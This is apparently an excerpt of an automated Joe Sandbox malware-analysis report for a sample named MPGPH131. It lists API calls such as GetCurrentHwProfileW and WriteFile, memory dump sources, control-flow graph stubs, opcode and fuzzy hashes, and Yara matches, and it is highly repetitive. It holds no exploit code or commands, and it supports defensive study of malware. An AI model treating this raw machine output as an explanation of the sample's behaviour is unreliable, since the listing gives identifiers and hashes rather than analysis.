                                    • Instruction ID: f50864d812b6285f9d37672a2e8721f7e81c5d3311cdf7751d040f204d7a32ec
                                    • Opcode Fuzzy Hash: 4f5e464b853c251c0727194962dc3842f39a68753e9d7d9b1ecad3ced810fe01
                                    • Instruction Fuzzy Hash: 9251C1EB70C110BDFE5296452B50AFA16EDE7C67307B0A426F807D5682F3942E8574B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 709 4e90744-4e90874 726 4e9088d-4e908a0 GetCurrentHwProfileW 709->726 727 4e908b5-4e90982 call 4e90984 726->727 738 4e90989-4e90b45 727->738 739 4e90984 727->739 739->738
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 368fa7fa55cb9bbeb4cf2908d64babca9500520f01c357d95c2eeca9fe6062df
                                    • Instruction ID: b66b0f7e181e6d87052eee90793a03fecc0c4d1fca6339c5af265a9fdd211af6
                                    • Opcode Fuzzy Hash: 368fa7fa55cb9bbeb4cf2908d64babca9500520f01c357d95c2eeca9fe6062df
                                    • Instruction Fuzzy Hash: 3F41D0EB30D124BDFE6286461B50AF616EDE7C67307B0A026B807D56C2F3D42E8974B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 763 4e90777-4e90874 777 4e9088d-4e908a0 GetCurrentHwProfileW 763->777 778 4e908b5-4e90982 call 4e90984 777->778 789 4e90989-4e90b45 778->789 790 4e90984 778->790 790->789
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 55c4339ec897fd5454d41b2b069727ec980ad0cba46df25c019209376e46ce9d
                                    • Instruction ID: 091660d6224590b8b4f691ebef58cade3bd04a56ac7134a4dbf363a547e79c5d
                                    • Opcode Fuzzy Hash: 55c4339ec897fd5454d41b2b069727ec980ad0cba46df25c019209376e46ce9d
                                    • Instruction Fuzzy Hash: 0E41D0EB30D120BDF96286461B50AF656EDE7C67307B0A426B807D5682F2D42E8570B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 814 4e9079f-4e907aa 815 4e9078b-4e9079a 814->815 816 4e907ac 814->816 818 4e907ae-4e90874 815->818 816->818 830 4e9088d-4e908a0 GetCurrentHwProfileW 818->830 831 4e908b5-4e90982 call 4e90984 830->831 842 4e90989-4e90b45 831->842 843 4e90984 831->843 843->842
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 5c6514d5811ae0154f956395707eac1c79f60b62c5a49c1bc05430a6c3391f46
                                    • Instruction ID: 72f6fe7e6581add06586eb49b72ab1987d142bb3e43d99f01e65c26316f71e8b
                                    • Opcode Fuzzy Hash: 5c6514d5811ae0154f956395707eac1c79f60b62c5a49c1bc05430a6c3391f46
                                    • Instruction Fuzzy Hash: C341E3BB70C110ADFA6286451B50AF666EDE7C67307B0A42AF807D56C1F3D42E8570B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 7a5f06da91f6c7977eb8edce1bd12c774fcb457aaaa9408ea2fb58b72a6c0712
                                    • Instruction ID: d188a7cf590c39b104d29e259ed0fcdceb82b14a88626b109b690fc535234f3f
                                    • Opcode Fuzzy Hash: 7a5f06da91f6c7977eb8edce1bd12c774fcb457aaaa9408ea2fb58b72a6c0712
                                    • Instruction Fuzzy Hash: F841E3EB70C124ADFD6286461B50AFA56EDE7C67307B0A026B807D56C2F3D42E8530B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 10b8e818aabde4f2e7b0f6d217096043745b25c0dea7e77ddd67d7e3cf53a1e0
                                    • Instruction ID: b418c4c9035589db65b696b581fa3d16dfd5f37f0ec2b8def9e2bf5b3cf5eca4
                                    • Opcode Fuzzy Hash: 10b8e818aabde4f2e7b0f6d217096043745b25c0dea7e77ddd67d7e3cf53a1e0
                                    • Instruction Fuzzy Hash: 8B4101EB30D124ADFD6286451B50AFA56EDE7C67307B0A02AF907D52C2F3D42E8930B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 96702f3a397a60a8ab80a1081b9f0b016509231ba5b45aabbe1f66d067a66eb9
                                    • Instruction ID: fe2c8f9c7a1076f3190ea19745cbba598ba69b0806a0f2d7937340800f738088
                                    • Opcode Fuzzy Hash: 96702f3a397a60a8ab80a1081b9f0b016509231ba5b45aabbe1f66d067a66eb9
                                    • Instruction Fuzzy Hash: 9541E2EB70C114BDF96286451B50AF656EDE7C67307B0A066F907D52C2F3E42E8570B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: adbae7a114d1c64b55b9a678503b66819f5591f02ecbbbfffaf2ebe55914463f
                                    • Instruction ID: 35c2fbf04c9ea9afa997a718f902d567360653d9cec582307a72b8ff97accfcc
                                    • Opcode Fuzzy Hash: adbae7a114d1c64b55b9a678503b66819f5591f02ecbbbfffaf2ebe55914463f
                                    • Instruction Fuzzy Hash: 3041E1EB70C120ADFD6286461B50AFA56EDE7C67307B0A066F907D52C2F3E42E8570B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: c3d5d050a8a5c4991a3343d8160eff9245c64a278593add66356e07f8b7aec56
                                    • Instruction ID: 46c16ed29eaf34db970f0b9983f3054123c5562baae1861b2b5a42369ad6e120
                                    • Opcode Fuzzy Hash: c3d5d050a8a5c4991a3343d8160eff9245c64a278593add66356e07f8b7aec56
                                    • Instruction Fuzzy Hash: 1241E4AB70D110ADFA5286451B50AFA67EDE7C67307B0A06AF907D62C2F3D42E8560B1
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,003E6747,?,00000000,00000000,00000000,?,00000000,?,003DBC71,003E6747,00000000,003DBC71,?,?), ref: 003F2CE1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 186e3d9af48edecac606489e1ed463ddcf0bcaa61d439faa86b67f361818f064
                                    • Instruction ID: 25cedc80f04d19357b19547b4af0cd650e20d775b4d325f670d6ba61251a9bb7
                                    • Opcode Fuzzy Hash: 186e3d9af48edecac606489e1ed463ddcf0bcaa61d439faa86b67f361818f064
                                    • Instruction Fuzzy Hash: E761BDB190411DEEDF12DFA8C884EFFBFB9AF09304F150155EA10AB256D776D9019BA0
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: dc497e6af9b87729d213b95b3009db028262cb8000489642070ad585987bf5ce
                                    • Instruction ID: 060244cdba111f91126cfed967f52e1b122aca9655196043ebe2266e852a122b
                                    • Opcode Fuzzy Hash: dc497e6af9b87729d213b95b3009db028262cb8000489642070ad585987bf5ce
                                    • Instruction Fuzzy Hash: 4741E2FB70C120ADFA6286451B10AFA67EDE7C67307B0A066F907D56C2F3942E8560B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: ce1767742bc027d0bf33a2fa9ed4e410d4af8065427e5745129eb350923426da
                                    • Instruction ID: 5ce72b87a4dd110e7d3b8f4b447f1a86bf195c6d16ac443171ac46a29a97a3da
                                    • Opcode Fuzzy Hash: ce1767742bc027d0bf33a2fa9ed4e410d4af8065427e5745129eb350923426da
                                    • Instruction Fuzzy Hash: 774103BB70D110ADF96286451B10AF667EDE7C67307B0A06AF907D52C2F3E42E8570B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 50e35354cebd95ad7a175a6696430d9f59884167299b5be2b07ee2895ef6c263
                                    • Instruction ID: c8ce51cd881a580cb343516bf4684ae353b75e72c40142184f7678722a20bc47
                                    • Opcode Fuzzy Hash: 50e35354cebd95ad7a175a6696430d9f59884167299b5be2b07ee2895ef6c263
                                    • Instruction Fuzzy Hash: 1C41D2EB70C124ADF96286451B10AFA66EDE7C77307B0A066F907D56C2F3E42E8570B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f8f440e2f1a16db9a725324876468b524040a77ded17364d1df2b7186f570a4d
                                    • Instruction ID: e0462f8d5b602f2a9529f30e6b73ca0c6796159e199aae597c92bc8a0832417d
                                    • Opcode Fuzzy Hash: f8f440e2f1a16db9a725324876468b524040a77ded17364d1df2b7186f570a4d
                                    • Instruction Fuzzy Hash: 9D31D2EB70C110ADFA5282451B50AF657EEE7C77307B0A06AF907D56C2F3D42E8961B2
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 8ed4540591ed776bd0c96bdfa57ee9ee44f223f4e088e529bb64769c21339810
                                    • Instruction ID: d3c6128b1b22518f7ee429dbf4f41021fdfe097217a9b655cffb72e35795e41f
                                    • Opcode Fuzzy Hash: 8ed4540591ed776bd0c96bdfa57ee9ee44f223f4e088e529bb64769c21339810
                                    • Instruction Fuzzy Hash: 183123EB30C110ADF95286411B10AF667EDE7C67307B0A02AF907D62C1F3D42E8570B1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 854bf3722356dbe0acf605f0fb7db8010ac7a5325cea143bfc49d4428bf4e005
                                    • Instruction ID: 4f3213c5527bffc82da4f8a9916e024d181edaf9d9433bc1e05e77a122fdeccd
                                    • Opcode Fuzzy Hash: 854bf3722356dbe0acf605f0fb7db8010ac7a5325cea143bfc49d4428bf4e005
                                    • Instruction Fuzzy Hash: B131C2EB70C120ADF95286451B50AF656EEE7C77307B0A02AB907D56C2F3D42E8570B2
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0036B801
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction ID: ea656757d3a7544289a05b87099e9647513226a71083034232933395523a3f36
                                    • Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction Fuzzy Hash: CE4138739001159BCB17EF68DC8066EBBA9EF84350F15426AF805EB346D730EE518BE1
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003F20B9,00000000,CF830579,00431090,0000000C,003F2175,003E627D,?), ref: 003F2228
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 2fb7e1e4a8c28228bee443ad3b393b9e31efea577710e0c56d5ff1e3781a26bd
                                    • Instruction ID: 3464b3945a8dddda036b565e8c2faaa502f9e8a86a86ff443cb4258c820491fa
                                    • Opcode Fuzzy Hash: 2fb7e1e4a8c28228bee443ad3b393b9e31efea577710e0c56d5ff1e3781a26bd
                                    • Instruction Fuzzy Hash: 2D11263360922CA6D6272274AC81B7F6B898F82734F770629FB189F1D2DA71AC415195
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00430D48,003DBC71,00000002,003DBC71,00000000,?,?,?,003EB826,00000000,?,003DBC71,00000002,00430D48), ref: 003EB758
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 0362a01eaa0bd14c68309f1e59f4d0d9492629f11a3d97d1e809e37101817659
                                    • Instruction ID: f6c39c8d6866f0c5a7b7ed55519eee1f2cd094342b6cf8cdf434ff6212963403
                                    • Opcode Fuzzy Hash: 0362a01eaa0bd14c68309f1e59f4d0d9492629f11a3d97d1e809e37101817659
                                    • Instruction Fuzzy Hash: B9010432610165ABCF079F5ACC418AE7B6ADFC1320B250308F8519B6D0EA71ED419B90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00301FDE
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
                                    • Instruction ID: 888deaddd1599a7eec76a846bd8bd0f658a924b08e7ef8ad274dbde810d19fc8
                                    • Opcode Fuzzy Hash: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
                                    • Instruction Fuzzy Hash: 07014E3641030EA7CB17ABA4FC1154A779C9E02360B508333F508AE6D1FB70E954C7D4
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,003DADBC,?,?,003F3439,00000001,00000364,?,00000006,000000FF,?,003DDD3B,?,?,?,?), ref: 003F3AF4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 3e92bccb57419de7686c8952aada4fcaf445c2f4eed7ce244d06842b3cfde3b2
                                    • Instruction ID: e282200b270c2c6dcec7e25a01c090cb16339d898a618a19f2c7d2a5d83541d1
                                    • Opcode Fuzzy Hash: 3e92bccb57419de7686c8952aada4fcaf445c2f4eed7ce244d06842b3cfde3b2
                                    • Instruction Fuzzy Hash: 6EF0E03260952C66DF136A278C11B7B3B489F41760B164111EE449A1D4CB21DE0081E5
                                    APIs
